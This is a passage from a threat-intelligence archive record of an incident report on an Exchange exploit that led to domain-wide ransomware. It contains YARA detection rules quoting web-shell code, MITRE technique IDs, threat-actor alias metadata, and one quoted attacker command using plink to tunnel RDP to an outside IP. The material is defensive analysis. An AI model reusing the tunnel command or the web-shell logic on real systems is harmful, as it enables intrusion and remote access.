\"var result = delimiter + this.RunIt(Request.Params[\\\"exec_code\\\"]) + delimiter;\" fullword ascii\r\n $s13 = \"AAAAAAAAAAAAAAAAAAAAAAAA6AAAAAAAAAAAAAAA\" ascii /* base64 encoded string ':' */\r\n $s14 = \"using (StreamReader streamReader = process.StandardOutput)\" fullword ascii\r\n $s15 = \"private string RunIt(string command)\" fullword ascii\r\n $s16 = \"Process process = Process.Start(info);\" fullword ascii\r\n $s17 = \"ProcessStartInfo info = new ProcessStartInfo();\" fullword ascii\r\n $s18 = \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6\" ascii /* base64 encoded string ':' */\r\n $s19 = \"6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" ascii /* base64 encoded string\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 25 of 27\n\n$s20 = \"if (Request.Params[\\\"exec_code\\\"] == \\\"put\\\")\" fullword ascii\r\n condition:\r\n uint16(0) == 0x4221 and filesize \u003c 800KB and\r\n 8 of them\r\n}\r\nrule sig_6898_dcrypt {\r\n meta:\r\n description = \"6898 - file dcrypt.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-11-14\"\r\n hash1 = \"02ac3a4f1cfb2723c20f3c7678b62c340c7974b95f8d9320941641d5c6fd2fee\"\r\n strings:\r\n $s1 = \"For more detailed information, please visit http://www.jrsoftware.org/ishelp/index.php?topic=setupc\r\n $s2 = \"Causes Setup to create a log file in the user's TEMP directory.\" fullword wide\r\n $s3 = \"Prevents the user from cancelling during the installation process.\" fullword wide\r\n $s4 = \"/http://crl4.digicert.com/sha2-assured-cs-g1.crl0L\" fullword ascii\r\n $s5 = \"Same as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\" fullw\r\n $s6 = \"/PASSWORD=password\" fullword wide\r\n $s7 = \"The Setup program accepts optional command line parameters.\" fullword wide\r\n $s8 = \"Overrides the default component settings.\" fullword wide\r\n $s9 = \"Specifies the password to use.\" fullword wide\r\n $s10 = \"/MERGETASKS=\\\"comma separated list of task names\\\"\" fullword wide\r\n $s11 = \"Instructs Setup to load the settings from the specified file after having checked the command line\r\n $s12 = \"/DIR=\\\"x:\\\\dirname\\\"\" fullword wide\r\n $s13 = \"http://diskcryptor.org/ \" fullword wide\r\n $s14 = \"Prevents Setup from restarting the system following a successful installation, or after a Preparin\r\n $s15 = \"HBPLg.sse\" fullword ascii\r\n $s16 = \"/LOG=\\\"filename\\\"\" fullword wide\r\n $s17 = \"Overrides the default folder name.\" fullword wide\r\n $s18 = \"Overrides the default setup type.\" fullword wide\r\n $s19 = \"Overrides the default directory name.\" fullword wide\r\n $s20 = \"* AVz'\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 5000KB and\r\n ( pe.imphash() == \"48aa5c8931746a9655524f67b25a47ef\" or 8 of them )\r\n}\r\nMITRE\r\nExploit Public-Facing Application – T1190\r\nOS Credential Dumping – T1003\r\nNetwork Service Scanning – T1046\r\nRemote Desktop Protocol – T1021.001\r\nAccount Manipulation – T1098\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 26 of 27\n\nValid Accounts – T1078\r\nProtocol Tunneling – T1572\r\nIngress Tool Transfer – T1105\r\nMatch Legitimate Name or Location – T1036.005\r\nWindows Service – T1543.003\r\nData Encrypted for Impact – T1486\r\nWeb Shell – T1505.003\r\nSystem Information Discovery – T1082\r\nSystem Network Configuration Discovery – T1016\r\nSystem Owner/User Discovery – T1033\r\nWindows Command Shell – T1059.003\r\nInternal case #6898\r\nSource: https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 27 of 27\n\n https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/ \nAnalysis and reporting completed by @0xtornado \u0026 @v3t0_\nReviewed by @samaritan_o \u0026 @svch0st \n Page 4 of 27\n\nThe threat actors (tcp[.]symantecserver[.]co) also dropped and in order executed plink.exe, to reach the creating RDP port on a remote SSH the Exchange system tunnel to 148.251.71[.]182 over the internet: \n\"powershell.exe\" /c echo y | plink.exe-N -T-R 0.0.0.0:1251:127.0.0.1:3389 148.251.71.182 -P 22 -l f\n Page 10 of 27", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/" ], "report_names": [ "exchange-exploit-leads-to-domain-wide-ransomware" ], "threat_actors": [ { "id": "d8af157e-741b-4933-bb4a-b78490951d97", "created_at": "2023-01-06T13:46:38.748929Z", "updated_at": "2026-04-10T02:00:03.087356Z", "deleted_at": null, "main_name": "APT35", "aliases": [ "COBALT MIRAGE", "Agent Serpens", "Newscaster Team", "Magic Hound", "G0059", "Phosphorus", "Mint Sandstorm", "TunnelVision" ], "source_name": "MISPGALAXY:APT35", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6b4a82e8-21f1-4bc7-84cf-e27334998b48", "created_at": "2022-10-25T16:07:23.84296Z", "updated_at": "2026-04-10T02:00:04.762229Z", "deleted_at": null, "main_name": "DEV-0270", "aliases": [ "DEV-0270", "DireFate", "Lord Nemesis", "Nemesis Kitten", "Yellow Dev 23", "Yellow Dev 24" ], "source_name": "ETDA:DEV-0270", "tools": [ "Impacket", "LOLBAS", "LOLBins", "Living off the Land", "WmiExec" ], "source_id": "ETDA", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "eaef3218-1f8c-4767-b1ff-da7a6662acc0", "created_at": "2023-03-04T02:01:54.110909Z", "updated_at": "2026-04-10T02:00:03.359871Z", "deleted_at": null, "main_name": "DEV-0270", "aliases": [ "Nemesis Kitten", "Storm-0270" ], "source_name": "MISPGALAXY:DEV-0270", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4", "created_at": "2022-10-25T15:50:23.808974Z", "updated_at": "2026-04-10T02:00:05.291959Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "Magic Hound", "TA453", "COBALT ILLUSION", "Charming Kitten", "ITG18", "Phosphorus", "APT35", "Mint Sandstorm" ], "source_name": "MITRE:Magic Hound", "tools": [ "Impacket", "CharmPower", "FRP", "Mimikatz", "Systeminfo", "ipconfig", "netsh", "PowerLess", "Pupy", "DownPaper", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "2bfa2cf4-e4ce-4599-ab28-d644208703d7", "created_at": "2025-08-07T02:03:24.764883Z", "updated_at": "2026-04-10T02:00:03.611225Z", "deleted_at": null, "main_name": "COBALT MIRAGE", "aliases": [ "DEV-0270 ", "Nemesis Kitten ", "PHOSPHORUS ", "TunnelVision ", "UNC2448 " ], "source_name": "Secureworks:COBALT MIRAGE", "tools": [ "BitLocker", "Custom powershell scripts", "DiskCryptor", "Drokbk", "FRPC", "Fast Reverse Proxy (FRP)", "Impacket wmiexec", "Ngrok", "Plink", "PowerLessCLR", "TunnelFish" ], "source_id": "Secureworks", "reports": null }, { "id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f", "created_at": "2022-10-25T16:07:23.83826Z", "updated_at": "2026-04-10T02:00:04.761303Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "APT 35", "Agent Serpens", "Ballistic Bobcat", "Charming Kitten", "CharmingCypress", "Cobalt Illusion", "Cobalt Mirage", "Educated Manticore", "G0058", "G0059", "Magic Hound", "Mint Sandstorm", "Operation BadBlood", "Operation Sponsoring Access", "Operation SpoofedScholars", "Operation Thamar Reservoir", "Phosphorus", "TA453", "TEMP.Beanie", "Tarh Andishan", "Timberworm", "TunnelVision", "UNC788", "Yellow Garuda" ], "source_name": "ETDA:Magic Hound", "tools": [ "7-Zip", "AnvilEcho", "BASICSTAR", "CORRUPT KITTEN", "CWoolger", "CharmPower", "ChromeHistoryView", "CommandCam", "DistTrack", "DownPaper", "FRP", "Fast Reverse Proxy", "FireMalv", "Ghambar", "GoProxy", "GorjolEcho", "HYPERSCRAPE", "Havij", "MPK", "MPKBot", "Matryoshka", "Matryoshka RAT", "MediaPl", "Mimikatz", "MischiefTut", "NETWoolger", "NOKNOK", "PINEFLOWER", "POWERSTAR", "PowerLess Backdoor", "PsList", "Pupy", "PupyRAT", "SNAILPROXY", "Shamoon", "TDTESS", "WinRAR", "WoolenLogger", "Woolger", "pupy", "sqlmap" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775441555, "ts_updated_at": 1775792040, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/39a7c810ea0bbe87870f054ce243a272e263efaf.pdf", "text": "https://archive.orkl.eu/39a7c810ea0bbe87870f054ce243a272e263efaf.txt", "img": "https://archive.orkl.eu/39a7c810ea0bbe87870f054ce243a272e263efaf.jpg" } }